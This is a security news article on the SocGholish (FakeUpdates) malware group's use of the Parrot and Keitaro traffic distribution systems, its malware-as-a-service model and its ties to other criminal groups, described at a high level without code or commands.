SocGholish Malware Evolves, Using Traffic Distribution Systems to Target Victims
The group behind the SocGholish malware has intensified its use of the Parrot TDS and Keitaro TDS traffic distribution systems to filter visitors and redirect them to malicious destinations. According to Silent Push, the foundation of their operations lies in a Malware-as-a-Service (MaaS) model, in which access to already compromised devices is sold to other cybercriminal groups. SocGholish, also known as FakeUpdates, is a JavaScript loader distributed via compromised websites under the guise of updates for popular browsers or applications such as Adobe Flash Player and Microsoft Teams. The campaign is attributed to TA569, also tracked as Gold Prelude, Mustard Tempest, Purple Vallhund, and UNC1543.
The infection chain begins with the deployment of SocGholish onto compromised systems, after which access is provided to its clients — among them Evil Corp, LockBit, Dridex, and Raspberry Robin. In several recent operations, Raspberry Robin itself has been leveraged as a delivery channel for SocGholish. Silent Push notes that websites may be infected either through direct JavaScript injection or via an intermediary script that subsequently downloads the main malware.
Beyond direct downloads from infected sites, third-party TDS platforms such as Parrot and Keitaro play a pivotal role in distribution. These systems redirect traffic to targeted pages after performing deep inspection of the victim’s device and user profile. Keitaro TDS is notorious not only for its role in malvertising, but also for delivering exploit kits, loaders, ransomware, and even influence operations. In 2023, it was revealed that SocGholish, in cooperation with VexTrio, used Keitaro to funnel victims toward VexTrio’s TDS. Because Keitaro also has legitimate use cases, blocking it without risking false positives is challenging. Keitaro has been linked to TA2726, which supplies traffic to both SocGholish and TA2727, profiting from the sale of compromised websites embedded with TDS links.
Traffic flows through an intermediary C2 infrastructure, which dynamically crafts the payload for each victim in real time. The entire process — from script injection to malware execution on a Windows system — is orchestrated by SocGholish’s C2 servers. If the target fails to meet predefined criteria, the download is aborted. Analysis further suggests that former members of the Dridex and Raspberry Robin projects may be involved in these campaigns, explaining the overlaps in infrastructure and operational tactics.
